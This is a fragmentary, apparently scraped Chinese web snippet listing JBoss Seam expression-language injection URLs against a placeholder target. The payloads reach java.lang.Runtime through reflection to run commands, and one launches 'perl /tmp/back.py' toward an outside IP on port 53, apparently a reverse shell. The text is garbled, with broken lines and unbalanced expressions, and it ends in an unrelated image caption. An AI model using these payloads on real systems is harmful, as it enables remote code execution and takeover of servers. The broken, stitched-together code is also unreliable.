目标:http://www.ip.com
<a href="http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478">http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478</a>
<a href="http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3Fpwned%3D%23%7Bexpressions.getClass().forName">http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName</a>
('java.lang.Runtime').getDeclaredMethods()[6]}
<a href="http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3Fpwned%3D%23%7Bexpressions.getClass().forName">http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName</a>
('java.lang.Runtime')}.getDeclaredMethods()[13]}
('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName
/tmp/back.py')}
home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName
('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'perl /tmp/back.py 118.122.176.42 53')}
![數說安全公布2020年中國網絡安全市場全景圖,中安威士榜上有名[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)